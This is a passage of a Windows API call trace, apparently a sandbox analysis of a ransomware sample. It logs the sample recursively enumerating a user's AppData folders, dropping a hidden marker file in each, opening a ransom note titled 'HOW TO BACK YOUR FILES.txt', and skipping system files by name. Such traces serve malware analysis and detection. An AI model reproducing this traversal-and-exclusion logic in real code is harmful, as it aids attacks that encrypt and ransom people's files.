lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" [0065.712] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.715] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.718] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.718] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.718] CloseHandle (hObject=0x2a0) returned 1 [0065.719] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy") returned 87 [0065.719] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.719] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82539239, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x73a62109, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf07d1393, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102890 [0065.719] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.719] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.719] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.719] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.719] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82539239, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x73a62109, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf07d1393, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.719] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.719] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.719] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.719] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.719] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.719] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf07d1393, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf07d1393, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf07f74e1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.719] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.720] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.720] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x825856ce, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x3722267d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3722267d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0065.720] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.720] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.720] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0065.720] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0065.720] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0065.720] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0065.720] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0065.720] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0065.720] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0065.720] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0065.720] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0065.720] lstrcpyW (in: lpString1=0x130ebe8, lpString2="AC" | out: lpString1="AC") returned="AC" [0065.720] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122240 [0065.720] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb6) returned 0x122780 [0065.720] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122248 | out: ListHead=0xf68b0, ListEntry=0x122248) returned 0x11cd48 [0065.720] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8255f469, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0d945b1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8255f469, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0065.720] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.720] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.720] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0065.720] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0065.720] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0065.720] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0065.720] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0065.720] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0065.720] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0065.720] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0065.720] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0065.720] lstrcpyW (in: lpString1=0x130ebe8, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0065.720] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122260 [0065.720] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc0) returned 0xefb28 [0065.720] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122268 | out: ListHead=0xf68b0, ListEntry=0x122268) returned 0x122248 [0065.720] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82539239, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0d94c08, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x82539239, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0065.720] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.721] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.721] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0065.721] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0065.721] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0065.721] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0065.721] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0065.721] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0065.721] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0065.721] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0065.721] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0065.721] lstrcpyW (in: lpString1=0x130ebe8, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0065.721] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122300 [0065.721] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc6) returned 0x116ad0 [0065.721] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122308 | out: ListHead=0xf68b0, ListEntry=0x122308) returned 0x122268 [0065.721] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82539239, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0d9538e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x82539239, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0065.721] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.721] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.721] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0065.721] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0065.721] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0065.721] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0065.721] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0065.721] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0065.721] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0065.721] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0065.721] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0065.721] lstrcpyW (in: lpString1=0x130ebe8, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0065.721] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122180 [0065.721] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc6) returned 0x116860 [0065.721] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122188 | out: ListHead=0xf68b0, ListEntry=0x122188) returned 0x122308 [0065.721] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82539239, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0d95a84, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x82539239, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0065.721] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.721] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.721] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0065.722] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0065.722] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0065.722] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0065.722] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0065.722] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0065.722] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0065.722] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0065.722] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0065.722] lstrcpyW (in: lpString1=0x130ebe8, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0065.722] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122060 [0065.722] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xca) returned 0x108688 [0065.722] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122068 | out: ListHead=0xf68b0, ListEntry=0x122068) returned 0x122188 [0065.722] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8255f469, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x712f2959, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x712f2959, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0065.722] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.722] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.722] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0065.722] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0065.722] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0065.722] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0065.722] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0065.722] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0065.722] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0065.722] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0065.722] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0065.722] lstrcpyW (in: lpString1=0x130ebe8, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0065.722] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0065.722] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc2) returned 0x116790 [0065.722] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122128 | out: ListHead=0xf68b0, ListEntry=0x122128) returned 0x122068 [0065.722] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734de9c3, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x734de9c3, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x734de9c3, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0065.722] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.722] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.722] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0065.722] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0065.723] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0065.723] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0065.723] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0065.723] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0065.723] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0065.723] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0065.723] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0065.723] lstrcpyW (in: lpString1=0x130ebe8, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0065.723] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122100 [0065.723] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xcc) returned 0x108760 [0065.723] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122108 | out: ListHead=0xf68b0, ListEntry=0x122108) returned 0x122128 [0065.723] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82539239, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0e8d7ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x82539239, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0065.723] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.723] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.723] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0065.723] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0065.723] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0065.723] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0065.723] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0065.723] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0065.723] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0065.723] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0065.723] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0065.723] lstrcpyW (in: lpString1=0x130ebe8, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0065.723] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222a0 [0065.723] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc4) returned 0x116930 [0065.723] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222a8 | out: ListHead=0xf68b0, ListEntry=0x1222a8) returned 0x122108 [0065.723] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82539239, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0e8d7ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x82539239, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0065.723] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0065.724] lstrcpyW (in: lpString1=0x130ebe8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.724] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.724] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.725] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.725] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.725] CloseHandle (hObject=0x2cc) returned 1 [0065.725] CloseHandle (hObject=0x2a0) returned 1 [0065.725] GetCurrentThreadId () returned 0xd98 [0065.725] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222a8 [0065.725] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\TempState" [0065.725] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116930 | out: hHeap=0xe0000) returned 1 [0065.725] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222a0 | out: hHeap=0xe0000) returned 1 [0065.725] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\TempState" [0065.725] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\TempState\\" [0065.725] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" [0065.725] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.246] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.248] FlushFileBuffers (hFile=0x228) returned 1 [0066.249] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.249] CloseHandle (hObject=0x228) returned 1 [0066.250] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\TempState") returned 97 [0066.250] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.250] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82539239, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0e8d7ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0cd9c1f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0066.250] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.250] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.250] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.250] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.250] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82539239, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0e8d7ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0cd9c1f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.250] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.250] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.250] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.250] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.250] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.250] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0cd9c1f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0cd9c1f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0d00340, 